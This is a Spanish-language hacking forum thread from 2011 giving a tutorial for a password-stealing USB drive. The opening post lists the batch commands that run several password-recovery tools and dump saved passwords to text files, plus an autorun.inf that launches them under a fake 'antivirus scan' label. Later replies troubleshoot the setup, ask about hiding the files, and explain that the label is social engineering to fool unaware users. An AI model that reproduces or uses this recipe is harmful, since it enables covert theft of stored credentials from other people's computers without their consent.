Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Tutorial - Crear USB Roba Datos

  • 17 Respuestas
  • 13224 Vistas

0 Usuarios y 3 Visitantes están viendo este tema.

Desconectado Stiuvert

  • *
  • Moderador
  • Mensajes: 2675
  • Actividad:
    0%
  • Reputación 14
    • Ver Perfil
  • Skype: stiuvert@gmail.com
  • Twitter: @Stiuvert
« en: Agosto 12, 2011, 03:06:53 pm »
Este es un nuevo método para crear un USB Roba Datos el cual será un pequeño Stealer que se ejecutará por autorun. Aviso de que si está desactivado no funcionará.


Utilizaremos los siguientes programas (cada uno utilizará una función distinta):

MessenPass
Mail PassView
IE Passview
Protected storage pass viewer(PSPV)
Password Fox


Vamos a descomprimir los archivos y a colocar el ejecutable en la raíz del dispositivo de almacenamiento USB.


Ahora creamos un código en Batch para que ejecute los programas:

Código: [Seleccionar]
   
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt


Ahora crearemos el autorun que se tendrá que guardar como "autorun.inf"

Código: [Seleccionar]
   
[autorun]
open=launch.bat
ACTION= Realizar Escaner Antivirus


Listo, nuestro USB ahora cada vez que lo introduzcamos en un PC nos guardará en archivos de texto las passwords almacenadas.


Autor: The_Maxu
Redactado: Stiuvert

Saludos

Desconectado Only

  • *
  • Underc0der
  • Mensajes: 219
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
  • Skype: cesartorres.1688
« Respuesta #1 en: Agosto 14, 2011, 09:21:35 pm »
si ponemos los programas,elbatch y el autorun como ocultos funciona?

Desconectado Benzakeitor

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #2 en: Agosto 14, 2011, 11:08:11 pm »
si ponemos los programas,elbatch y el autorun como ocultos funciona?

exactamente la misma pregunta ??
y abra alguna manera para Ubuntu ??

Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #3 en: Agosto 15, 2011, 02:09:15 am »
primero en linux no se podría hacer esto,puesto q denega permisos de copia, se podría hacer algo con un poco de programación en java, c pero con estos programas no.
[ONLY] como oculto funciona al menos en su momento hace unos 2 años cuando conocí este stealer sí funcionaba
« Última modificación: Agosto 15, 2011, 02:11:26 am por Snifer »
http://www.sniferl4bs.com


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Desconectado Stiuvert

  • *
  • Moderador
  • Mensajes: 2675
  • Actividad:
    0%
  • Reputación 14
    • Ver Perfil
  • Skype: stiuvert@gmail.com
  • Twitter: @Stiuvert
« Respuesta #4 en: Agosto 15, 2011, 05:56:35 am »
Yo creo que sí tendría que funcionar como oculto, sería cuestión de probar.

Respecto a lo de Linux, imposible  ;D



Saludos

Desconectado Only

  • *
  • Underc0der
  • Mensajes: 219
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
  • Skype: cesartorres.1688
« Respuesta #5 en: Agosto 15, 2011, 04:11:23 pm »
Lo intente pero no me funciona .. hice el autorun.inf el batch y puse los programas en la raiz de la memoria pero cuando la inserto no hace nada.

lo seguire intentando

Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #6 en: Agosto 15, 2011, 06:04:42 pm »
Revisaste sí está activido en la pc,el inicio automático de aplicaciones lectura..
http://www.sniferl4bs.com


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Desconectado Only

  • *
  • Underc0der
  • Mensajes: 219
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
  • Skype: cesartorres.1688
« Respuesta #7 en: Agosto 15, 2011, 09:27:00 pm »
Revisaste sí está activido en la pc,el inicio automático de aplicaciones lectura..

Como reviso eso?

estuve googleando y dicen que no se puede ejecutar un bat desde un autorun .. es cierto?

podrian subir una copia de los archivos de una memoria funcionando porfavor

Desconectado Stiuvert

  • *
  • Moderador
  • Mensajes: 2675
  • Actividad:
    0%
  • Reputación 14
    • Ver Perfil
  • Skype: stiuvert@gmail.com
  • Twitter: @Stiuvert
« Respuesta #8 en: Agosto 16, 2011, 05:19:20 am »
Introduce un Pendrive y fíjate si te sale la "Reproducción automática" donde se escoge si quieres abrir la carpeta, reproducirla etc.


Saludos

Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #9 en: Agosto 16, 2011, 09:51:52 am »
ahi ta me olvidaba era reproducción automática... Stiuvert lo dijo sí no te da me avisas para q te suba uno y q no de el bat en el autorun no me acuerdo sí ese es el caso pasalo a exe =)
« Última modificación: Agosto 16, 2011, 09:53:52 am por Snifer »
http://www.sniferl4bs.com


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Desconectado Only

  • *
  • Underc0der
  • Mensajes: 219
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
  • Skype: cesartorres.1688
« Respuesta #10 en: Agosto 19, 2011, 02:51:34 am »
Alguien puede hacer un .exe que ejecute los demas .exe porfavor

Desconectado Stiuvert

  • *
  • Moderador
  • Mensajes: 2675
  • Actividad:
    0%
  • Reputación 14
    • Ver Perfil
  • Skype: stiuvert@gmail.com
  • Twitter: @Stiuvert
« Respuesta #11 en: Agosto 19, 2011, 07:32:48 am »
Alguien puede hacer un .exe que ejecute los demas .exe porfavor

Lo puedes hacer en Batch y compilarlo.

Desconectado L[0]L

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #12 en: Agosto 19, 2011, 11:52:51 am »
Se agradece y mucho, y una cosa puedo postearlo en otra página manteniendo Fuente y autor en todo momento?

Desconectado Stiuvert

  • *
  • Moderador
  • Mensajes: 2675
  • Actividad:
    0%
  • Reputación 14
    • Ver Perfil
  • Skype: stiuvert@gmail.com
  • Twitter: @Stiuvert
« Respuesta #13 en: Agosto 19, 2011, 12:05:54 pm »
Se agradece y mucho, y una cosa puedo postearlo en otra página manteniendo Fuente y autor en todo momento?


Por supuesto  ;)

Desconectado virus69

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #14 en: Noviembre 03, 2011, 01:18:36 pm »
Mi amigo el link de descarga ya caduco, podrias subirlo otra ves? Por favor!

Ya que no tuve oportunidad de bajarlo  :-\

Saludos...

Desconectado baron.power

  • *
  • Underc0der
  • Mensajes: 287
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #15 en: Marzo 21, 2012, 08:12:53 pm »
lo probare a ver que tal va, aunque por separado probe algunas de las tools d enirsoft y na d ena... gracias

Desconectado rollth

  • *
  • Underc0der
  • Mensajes: 876
  • Actividad:
    3.33%
  • Reputación 16
  • El conocimiento es libre.
    • Ver Perfil
    • Whateversec
    • Email
  • Twitter: @RoloMijan
« Respuesta #16 en: Febrero 02, 2014, 09:26:22 am »
Yo tengo un par de dudas, el autorum se hace desde el bloc de notas? action= escaner anitivirus es necesario?

Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #17 en: Febrero 03, 2014, 04:18:23 pm »
Lo del bloc de notas el scan av es solo para pasarlo por ing social y ejecute lo que tenga que ejecutar a un usuario que no tenga conocimiento lo que hara es ir a el y ejecutar el paquete, espero que tu duda haya sido resuelta.

Regards,
Snifer
http://www.sniferl4bs.com


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



 

¿Te gustó el post? COMPARTILO!



Breve Tutorial Sobre Ingenieria Social + Algunos Ejemplos

Iniciado por Krau[Z]ereth

Respuestas: 2
Vistas: 5524
Último mensaje Junio 28, 2012, 04:04:06 am
por aura16
Super tutorial de comandos MS-DOS(segunda parte) by k43l

Iniciado por k43l

Respuestas: 2
Vistas: 2994
Último mensaje Abril 06, 2010, 10:56:34 am
por k43l
Utilizando BeEF-XSS Framework-Tutorial Español - Backtrack 5 R3

Iniciado por Aryenal.Bt

Respuestas: 2
Vistas: 5078
Último mensaje Febrero 02, 2013, 09:02:37 pm
por Aryenal.Bt
Super tutorial de comandos MS-DOS(primera parte) by k43l

Iniciado por k43l

Respuestas: 6
Vistas: 4903
Último mensaje Abril 07, 2010, 09:35:17 pm
por k43l
Protege la configuración de google groups por defecto o no filtres tus datos!!!

Iniciado por Rootkit_Pentester

Respuestas: 0
Vistas: 1451
Último mensaje Agosto 02, 2017, 11:59:41 pm
por Rootkit_Pentester